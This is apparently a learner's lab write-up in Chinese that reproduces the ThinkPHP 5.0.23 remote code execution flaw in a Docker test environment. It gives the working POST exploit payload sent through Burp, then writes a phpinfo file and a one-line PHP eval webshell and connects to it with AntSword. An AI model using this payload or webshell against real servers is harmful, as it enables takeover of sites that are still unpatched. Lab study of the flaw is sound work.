Thinkphp5.0.23 rce(远程代码执行)的漏洞复现
漏洞形成原因
- 框架介绍:
ThinkPHP是一款运用极广的PHP开发框架。 - 漏洞引入:
其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞。
漏洞如何利用
- 1、访问靶机地址+端口号 进入首页
- 2、Burp抓包修改传参方式为Post,传入参数为"_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd",其中pwd为系统执行命令可进行一系列操作。
漏洞复现过程
- Kali docker 容器中启动此漏洞环境
- 浏览器访问 Kali 的 ip 地址接上8080端口
- Burp抓包修改传参方式为Post,url后接入/index.php?s=captch,传入参数为"_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd"。
/index.php?s=captch #url后接
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd #POST传入参数
-
Burp Go
-
尝试写入phpinfo
echo "<?php phpinfo(); ?>" > info.php
- 成功!
- 写入一句话
echo '<?php eval($_POST[aaa]); ?>' > shell.php #密码:aaa
- 上蚁剑!
- 漏洞复现成功
参考文章:https://www.cnblogs.com/zenb/p/14537240.html
技术萌新,还请各位大牛多多指点!